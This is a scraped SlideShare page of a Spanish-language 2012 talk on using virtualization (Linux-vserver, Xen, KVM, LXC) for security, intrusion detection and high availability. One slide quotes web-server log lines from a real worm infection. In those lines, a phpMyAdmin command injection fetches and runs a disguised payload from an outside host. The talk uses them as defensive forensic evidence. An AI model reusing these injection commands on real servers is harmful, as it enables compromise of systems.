SlideShare una empresa de Scribd logo

Seguridad por virtualización G4

Sandino Araico Sánchez
Sandino Araico Sánchez
Tecnología
1 de 38
Descargar para leer sin conexión
2012-10-30 Seguridad por virtualización G4 Simposium ITSSAT Derechos reservados © 2004-2012 Sandino Araico Sánchez <sandino@sandino.net> / Enrique A. Sánchez Montellano <enrique.sanchez@yaguarete-sec.com> / Rolando Cedillo Caballero <rolando@intelligencia.com> Se permite ilimitadamente el uso, copia, redistribución con o sin modificaciones siempre y cuando se mantenga el aviso de derecho de autor y se anoten al final de la presentación todas las modificaciones que se llevan a cabo conservando la historia de las modificaciones que hagan las demás personas e indicando la fecha de cada modificación y el nombre de la persona que la llevó a cabo.
Seguridad por virtualización Xen http://xensource.com Vbox http://www.virtualbox.org KVM http://linux-kvm.org Zonas de Open Solaris Open VZ http://openvz.org LXC http://lxc.sourceforge.net Linux-vserver http://linux-vserver.org GR Security http://grsecurity.net
Atributos de la seguridad por virtualización Eficiencia Encapsulamiento Auditabilidad Introspección Dureza
Introspección Host [root@carnitas root] ps fax PID TTY STAT TIME COMMAND 1? S 0:04 init [3] 2? SW 0:00 [keventd] 3? SW 0:00 [kapmd] 4? SWN 0:00 [ksoftirqd_CPU0] 5? Z 1:06 [kswapd <defunct>] 6? SW 0:08 [bdflush] 7? SW 5:57 [kupdated] 8? SW 6:56 [kjournald] guest vserver guest vserver guest vserver 61 ? SW 0:00 [khubd] 109 ? SW< 0:00 [mdrecoveryd] 1186 ? SW 0:03 [kreiserfsd] 31375 ? S 4:59 syslogd -m 0 21127 ? S 5:16 klogd -x ipv4root is now 192.168.4.9 350 ? ipv4root is now S ipv4root is now 192.168.4.10 127.0.4.10 New security context is 49163 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scripts/apmscript [root@fedora-install /] ps fax New security context is 49153 192.168.4.6 PID TTY STAT TIME COMMAND 17503 ? S 0:00 /usr/sbin/sshd [root@fedora-pruebas /] ps fax 21576 pts/23 S 0:00 /bin/bash -login 1092 pts/23 R 0:00 _ ps fax 28746 ? S 0:00 /usr/bin/freshclam -d -p /var/run/clamav/freshclam.pid 2482 ? S 0:18 _ /usr/sbin/sshd PID TTY STAT TIME COMMAND New security context is 27546 ? S 0:08 /usr/sbin/clamd 8936 ? S 0:00 _ /usr/sbin/clamd 26369 pts/19 S 0:00 | _ -bash 11416 pts/23 S 0:00 /bin/bash - 12545 pts/18 S 0:00 su jabber -c /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 8519 pts/18 S 0:00 _ /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 49154 21987 pts/18 S 0:00 _ /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 15624 pts/19 S 0:00 | _ screen -r 11587 ? 27159 ? S S login 0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d-ssl 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 6378 ? S 0:00 _ /usr/sbin/sshd 642 pts/23 R 0:00 _ ps fax 27614 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d [root@carnitas /] ps fax 23069 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 15630 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger imapd-ssl 22919 pts/22 S 0:00 | _ -bash 6387 ? 7574 ? S S 27525 ? S 2:10 /usr/sbin/rcd -r 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 0:00 /usr/lib/courier-imap/sbin/courierlogger imapd 18816 pts/22 S 0:00 | _ tail --follow=name /var/log/info 468 ? S 34:22 SCREEN PID TTY STAT TIME 29190 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 75 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger -pid=/var/run/authdaemon.courier-imap/pid -start /usr/lib/courier-imap/libe 7065 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 2924 ? S 0:00 _ /usr/sbin/sshd 16345 ? S 0:00 11908 pts/2 S 0:00 _ /bin/bash _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain COMMAND 342 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 3507 pts/23 S 0:00 _ -bash 17447 pts/2 S 125:19 | _ top 9778 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 30034 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 18176 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 5315 pts/23 R 0:00 _ ps fax 24134 pts/3 S 0:00 _ /bin/bash 29351 pts/23 S 12295 ? S 0:00 /usr/libexec/postfix/master 5888 ? S 0:00 _ qmgr -l -t fifo -u 5193 ? SL 0:00 ntpd -U ntp -g 15032 pts/4 S 0:01 _ /bin/bash 22906 ? S 0:00 _ pickup -l -t fifo -u 7880 ? S 0:03 /usr/bin/spamd -d -x -u spamd -m 6 -H /var/cache/spamd 0:00 /bin/bash -login 13036 ? S 0:01 _ spamd child 11656 ? S 0:00 gpm -t ps/2 -m /dev/psaux 29368 ? 12580 ? S S 0:01 _ spamd child 0:01 _ spamd child 30409 pts/5 S 0:09 _ /bin/bash 18722 ? S 0:00 crond 27016 pts/6 S 0:03 _ /bin/bash 13315 ? S 0:01 _ spamd child 30000 pts/23 R+ 0:00 23456 ? S 0:01 _ spamd child 27050 ? S 0:00 _ spamd child 27300 ? S 0:00 /usr/sbin/atd 16011 ? 9849 ? S S 0:00 /usr/sbin/httpd 18787 pts/12 S 0:06 _ /bin/bash 0:00 _ /usr/sbin/rotatelogs /var/log/httpd/sapodesk.access.log.%Y%B%d 604800 8063 ? S 0:00 /usr/local/sbin/rebootmgr --pidfile /var/run/rebootmgr.pid fedora fedora-pruebas gentoo mandrake redhat 19997 ? S 0:00 crond _ ps fax 21818 ? S 0:00 _ /usr/sbin/httpd 17319 ? S 0:00 _ /usr/sbin/httpd 16118 ? S 0:00 _ /usr/sbin/httpd 10923 ? S 0:00 login -- ruth 15154 ? S 0:00 _ /usr/sbin/httpd 26925 ? S 0:04 /usr/libexec/ 31178 ? Ss 0:04 / 22121 ? S 0:00 _ /usr/sbin/httpd 16086 tty2 S 0:01 _ -bash postfix/master 19986 ? S 0:00 _ /usr/sbin/httpd 22846 ? S 0:00 _ /usr/sbin/httpd 11579 ? S 0:00 _ /usr/sbin/httpd 14621 tty3 S 0:00 /sbin/mingetty tty3 15234 ? S 0:00 xinetd -stayalive usr/sbin/cron 3342 pts/18 S 0:00 /bin/sh /usr/bin/safe_mysqld --defaults-file=/etc/my.cnf 23346 pts/18 S 0:00 _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid- 15563 tty4 S 0:00 /sbin/mingetty tty4 -pidfile /var/run/xinetd.pid file= 28855 pts/18 S 0:00 _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid- 8298 ? Ss 0:00 / f 21516 tty5 S 0:00 /sbin/mingetty tty5 30840 pts/18 S 19176 pts/18 S 0:00 0:00 3983 ? S 0:09 /usr/sbin/sshd _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --p _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --p 13617 tty6 S 0:00 /sbin/mingetty tty6 12499 ? S 0:35 _ sshd: 24053 ? S 15:00 /usr/sbin/rcd -r usr/sbin/sshd 30151 ? S 0:00 crond 26749 ? S 0:03 /usr/sbin/sshd 2390 ? S 76:58 SCREEN 8813 ? 29821 pts/1 S S 0:11 _ sshd: root@pts/1 0:00 | _ -bash root@pts/0 1833 pts/7 S 0:00 _ /bin/bash 14284 pts/0 S 0:00 _ -bash 12965 ? Ss 0:00 / 4149 pts/1 S 0:00 | _ screen 2753 ? S 1:02 | _ SCREEN 8203 pts/11 S 0:00 | _ /bin/bash 3889 pts/8 S 0:01 _ /bin/bash 21729 pts/11 S 58:56 | | _ top 10672 pts/0 S 0:00 _ screen usr/sbin/syslogd -m 0 3848 pts/14 S 0:04 | _ /bin/bash 32320 pts/9 S 0:00 _ /bin/bash -r 9026 pts/15 S 0:00 | _ /bin/bash 17204 pts/20 S 0:00 | _ /bin/bash 602 pts/21 S 0:00 | _ /bin/bash 5109 pts/10 S 0:06 _ /bin/bash 21878 ? S 3:32 syslogd -m 0 [root@carnitas /] 12312 pts/18 S 0:01 | _ /bin/bash 3484 ? S 0:00 _ sshd: root@pts/16 90 pts/13 S 0:00 _ /bin/bash [root@fedora-pruebas /] 12719 pts/16 S 0:00 _ -bash 24044 pts/16 S 0:00 _ tail --follow=name /var/log/boot.log /var/log/cron /var/log/dmesg /var/log/httpd/access_log /var/log/htt 6578 pts/16 S 0:00 _ tail --follow=name /var/log/boot.log /var/log/cron /var/log/dmesg /var/log/httpd/access_log /var/log/htt 6877 pts/17 S 0:00 _ /bin/bash 1220 ? S [root@fedora-install /] 0:05 syslogd -m 0 24449 ? S 0:00 login -- viewlog 3085 tty1 S 0:00 _ /bin/sh /var/log/viewlogs.sh 4594 tty1 S 0:00 _ tail --follow=name boot.log cron dmesg ksyms.0 maillog messages mysqld.log secure apache/*log
VM VM VM (guest) (guest) (guest) Capa de virtualización Hardware (host)
Herramientas de detección de intrusos Snort AIDE / samhain Chkrootkit / RKHunter Tcpdump / Wireshark NTOP PSAD / blockhosts clamav
Sin virtualización Host 207.113.245.241 Snort Servicios en Log producción clientes hostiles
Con virtualización 207.113.245.241 Log Servicios Snort en producción Capa de virtualización tcpdump en el host clientes hostiles
Honeypot en producción 207.113.245.241 Log Snort Servicios probablemente vulnerables Capa de virtualización tcpdump en el host clientes hostiles
Firma de binarios Sin virtualización Host 207.113.245.241 /bin /lib /etc /usr/bin /usr/lib Log /usr/sbin /usr/sbin/aide clientes hostiles
Firma de binarios /bin /lib /etc /bin /lib /etc /bin /lib /etc /usr/bin /usr/bin /usr/bin Repo /usr/sbin /bin /lib /etc /usr/sbin /bin /lib /etc /usr/sbin /bin /lib /etc /usr/bin /usr/bin /usr/bin /usr/sbin /usr/sbin /usr/sbin Aide / samhain Capa de virtualización Hardware (host) clientes hostiles
Acceso a la red Iptables Iproute2 OpenVPN Squid Ipcop blockhosts
Sin virtualización Host 200.33.4.13 - 18 /var/www/html /home POP3 HTTP SMTP FTP IMAP FTP clientes
Con virtualización FTP HTTP SMTP POP3 Capa de virtualización /var/www/html /home Hardware (host) clientes
DMZ virtual FTP HTTP SMTP POP3 Capa de virtualización /var/www/html /home NAT Hardware (host) clientes
Así se ve un gusano arrachera.saks: 614 total, 2 running, 612 sleeping, 0 stopped, 0 zombie Cpu0 : 0.0%us, 0.1%sy, 0.0%ni, 97.2%id, 0.0%wa, 1.5%hi, 1.2%si, 0.0%st ... Mem: 12302896k total, 12038224k used, 264672k free, 1234036k buffers Swap: 4192880k total, 3280k used, 4189600k free, 7756440k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 16044 bin 24 0 3540 1956 1340 R 100 0.0 11:02.05 x 12188 40 17 0 23176 19m 1860 S 0 0.2 0:31.61 named 27265 40 15 0 15536 12m 2068 S 0 0.1 0:01.27 named 7721 root 15 0 17604 1968 992 R 0 0.0 1:04.83 top
Así se ve un gusano 599 [root@posh ~] vcontext --xid 126 --migrate -- ls -la /proc/16044 total 0 dr-x------ 6 bin bin 0 Oct 9 12:03 . dr-xr-xr-x 629 root root 0 Oct 8 08:24 .. dr-xr-xr-x 2 bin bin 0 Oct 9 12:17 attr ... -r--r--r-- 1 bin bin 0 Oct 9 12:14 cmdline lrwxrwxrwx 1 bin bin 0 Oct 9 12:17 cwd -> /vservers/eaea/usr/local/apache2/ eaea/data/bb -r-------- 1 bin bin 0 Oct 9 12:17 environ lrwxrwxrwx 1 bin bin 0 Oct 9 12:03 exe -> /vservers/eaea/usr/bin/perl ... -rw-r--r-- 1 bin bin 0 Oct 9 12:17 oom_adj -r--r--r-- 1 bin bin 0 Oct 9 12:17 oom_score lrwxrwxrwx 1 bin bin 0 Oct 9 12:17 root -> /vservers/eaea ...
Así se ve un gusano 84.194.192.10 - - [09/Oct/2009:06:19:28 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea;%20wget%20ns.ava- bg.com/~eliza/emsi.gif;%20tar%20zxvf%20emsi.gif;%20rm%2 0-rf%20emsi.gif;%20cd%20mc-root;%20./start%20php.My-Admin- HTTP/1.1" 200 318 84.194.192.10 - - [09/Oct/2009:06:19:50 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r;%20ps%20x HTTP/1.1" 200 827 84.194.192.10 - - [09/Oct/2009:06:20:32 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r;%20wget %20ns.ava-bg.com/~eliza/dd0s.gif;%20tar%20zxvf%20dd0s.gif;%20rm %20-rf%20dd0s.gif;%20cd%20bb;%20PATH=%22./%22%20httpd;%20ps%20x HTTP/1.1" 200 1123 84.194.192.10 - - [09/Oct/2009:06:20:54 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r/bb; %20./httpd;%20ps%20x HTTP/1.1" 200 839
Sistemas embebidos uClibc Gentoo embedded <--- Linux Not GNU USE=static Resource limits Storage limits Solamente un proceso estático y ya
Con virtualización (Embebidos) HTTP FTP SMTP POP3 Capa de virtualización /var/www/html /home Hardware (host) clientes
Funciona igual pero son más pequeños Un proceso por vserver Sistema de archivos mínimo No hay librerías No hay compiladores Fácilmente clusterizables
Virtualización + HA /var/www/html - NAS - /home Host A Host B Capa de virtualización VPS VPS VPS VPS VPS VPS VPS Director en standby Director Clientes
NAS redundante NAS A NAS B Host A Host B Capa de virtualización VPS VPS VPS VPS VPS VPS VPS Director en standby Director Clientes
Estable (viejo) Linux 2.6.22.19 Linux-Vserver 2.2.0.7 GR Security 2.1.11 LVM2 Gentoo hardened 10.0 NFS
Desarrollo Linux 3.2.22 Linux-Vserver 2.3.2.10 GR Security 2.9.1 LVM2 Gentoo hardened 12.0 DRBD OCFS2 / GFS2 / Glusterfs / Ceph
Cuadro comparativo Linux-vserver Libre Libre y Xen propietario KVM Libre LXC Libre
Sistema operativo Linux-vserver Linux Xen Linux / Net BSD / Open Solaris KVM Linux LXC Linux
Tecnología de virtualización Linux-vserver Soft partitioning Virtualización y Xen paravirtualización Virtualización y KVM paravirtualización LXC Soft partitioning
Encapsulamiento Linux-vserver Parcial Xen Sí KVM Sí LXC Parcial
Auditabilidad Linux-vserver Sí Xen No KVM No LXC Sí Xen y KVM podrían ser auditables si montamos el sistema de archivos raíz sobre NFS o sobre OCFS2/GFS2/Ceph
Introspección Linux-vserver Sí Xen No KVM No LXC Sí El acceso a la consola del S. O. no se considera introspección
GR Security Linux-vserver Sí Xen En Linux > 3.0 KVM Sí LXC Sí
Sistemas operativos heterogeneos Linux-vserver No Linux, Net BSD, Xen Open Solaris KVM Solo en AMD64 LXC No
Versión más reciente de Linux (sin GR Security) Linux-vserver 3.6 Xen 3.6.4 KVM 3.6.4 LXC 3.6.4
Versión más reciente de Linux (con GR Security) Linux-vserver 3.2.22 Xen 3.6.4 KVM 3.6.4 LXC 3.6.4
Firma de binarios Sin virtualización Host 207.113.245.241 /bin /lib /etc /usr/bin /usr/lib Log /usr/sbin /usr/sbin/aide clientes hostiles
IDS en el NAS NAS /bin /lib /etc /usr/bin /usr/lib /usr/sbin Log ( aide | chkrootkit | rkhunter | samhain ) ( snort | NTOP ) Host A Host B ( tcpdump | blockhosts ) Capa de virtualización VPS VPS VPS VPS clientes hostiles
Referencias http://linux-vserver.org http://sourceware.org/cluster/gfs/ http://grsecurity.net http://oss.oracle.com/projects/ocfs2/ http://www.openvz.org http://gluster.org http://www.uclibc.org http://www.drbd.org/ http://lxc.sourceforge.net/ http://www.linux-kvm.org http://mirrors.sandino.net/vserver/images http://linux-vserver.org/Linux-VServer-Paper http://www.redhat.com/magazine/014dec05/features/xen/ Sandino Araico Sánchez <sandino@1101.mx> @KBrown

Recomendados

Genaro rodriguez reynoso prectica 5 tra
Genaro rodriguez reynoso prectica 5 traGenaro rodriguez reynoso prectica 5 tra
Genaro rodriguez reynoso prectica 5 traGenaro Rodriguez
 
1.3.1.3 packet tracer
1.3.1.3 packet tracer1.3.1.3 packet tracer
1.3.1.3 packet tracerEdwin Gamboa
 
11.6.3
11.6.311.6.3
11.6.3victdiazm
 
11.6.1
11.6.111.6.1
11.6.1victdiazm
 
10 subredes
10 subredes10 subredes
10 subredesJorge Arroyo
 
6.3.3.7 colaborativo 3
6.3.3.7 colaborativo 36.3.3.7 colaborativo 3
6.3.3.7 colaborativo 3jorge alberto obando arevalo
 
Xc lab-7-nat
Xc lab-7-natXc lab-7-nat
Xc lab-7-nat1 2d
 
Rompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPRompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPDaniel Torres
 

Recomendados

Genaro rodriguez reynoso prectica 5 tra
Genaro rodriguez reynoso prectica 5 traGenaro rodriguez reynoso prectica 5 tra
Genaro rodriguez reynoso prectica 5 traGenaro Rodriguez
 
1.3.1.3 packet tracer
1.3.1.3 packet tracer1.3.1.3 packet tracer
1.3.1.3 packet tracerEdwin Gamboa
 
11.6.3
11.6.311.6.3
11.6.3victdiazm
 
11.6.1
11.6.111.6.1
11.6.1victdiazm
 
10 subredes
10 subredes10 subredes
10 subredesJorge Arroyo
 
6.3.3.7 colaborativo 3
6.3.3.7 colaborativo 36.3.3.7 colaborativo 3
6.3.3.7 colaborativo 3jorge alberto obando arevalo
 
Xc lab-7-nat
Xc lab-7-natXc lab-7-nat
Xc lab-7-nat1 2d
 
Rompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPRompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPDaniel Torres
 
Streaming replication
Streaming replicationStreaming replication
Streaming replicationSandino Araico Sánchez
 
Sistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando sshSistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando sshGabriel Orozco
 
Caché acelerador de contenido
Caché acelerador de contenidoCaché acelerador de contenido
Caché acelerador de contenidoSandino Araico Sánchez
 
Dbmail
DbmailDbmail
DbmailSandino Araico Sánchez
 
Técnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídosTécnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídosSandino Araico Sánchez
 
Proyectos imposibles
Proyectos imposiblesProyectos imposibles
Proyectos imposiblesSandino Araico Sánchez
 
2. Configuración OSPF
2. Configuración OSPF2. Configuración OSPF
2. Configuración OSPFDavid Narváez
 
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11spankito
 
Guia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalisGuia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalisasesinoevil
 
Observatorio de Medios
Observatorio de MediosObservatorio de Medios
Observatorio de MediosSvet Ivantchev
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Remigio Salvador Sánchez
 
Apuntes servidores
Apuntes servidoresApuntes servidores
Apuntes servidoresRene Zenteno
 
Administración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesAdministración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesRodolfo Pilas
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmapztealt
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son241514984
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 

Más contenido relacionado

Destacado

Sistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando sshSistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando sshGabriel Orozco
 
Técnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídosTécnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídosSandino Araico Sánchez
 

Destacado (6)

Streaming replication
Streaming replicationStreaming replication
Streaming replication
 
Sistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando sshSistema de administración de multiples servidores usando ssh
Sistema de administración de multiples servidores usando ssh
 
Caché acelerador de contenido
Caché acelerador de contenidoCaché acelerador de contenido
Caché acelerador de contenido
 
Dbmail
DbmailDbmail
Dbmail
 
Técnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídosTécnicas de CDN para la mitigación de ataques distribuídos
Técnicas de CDN para la mitigación de ataques distribuídos
 
Proyectos imposibles
Proyectos imposiblesProyectos imposibles
Proyectos imposibles
 

Similar a Seguridad por virtualización G4

2. Configuración OSPF
2. Configuración OSPF2. Configuración OSPF
2. Configuración OSPFDavid Narváez
 
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11spankito
 
Guia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalisGuia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalisasesinoevil
 
Observatorio de Medios
Observatorio de MediosObservatorio de Medios
Observatorio de MediosSvet Ivantchev
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Remigio Salvador Sánchez
 
Apuntes servidores
Apuntes servidoresApuntes servidores
Apuntes servidoresRene Zenteno
 
Administración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesAdministración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesRodolfo Pilas
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmapztealt
 

Similar a Seguridad por virtualización G4 (8)

2. Configuración OSPF
2. Configuración OSPF2. Configuración OSPF
2. Configuración OSPF
 
Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11Charla Nmap Jose Luis Chica Murcialanparty 11
Charla Nmap Jose Luis Chica Murcialanparty 11
 
Guia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalisGuia de configuracion cisco 881 w logicalis
Guia de configuracion cisco 881 w logicalis
 
Observatorio de Medios
Observatorio de MediosObservatorio de Medios
Observatorio de Medios
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
 
Apuntes servidores
Apuntes servidoresApuntes servidores
Apuntes servidores
 
Administración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesAdministración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicaciones
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmap
 

Último

GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son241514984
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
dokumen.tips_36274588-sistema-heui-eui.ppt
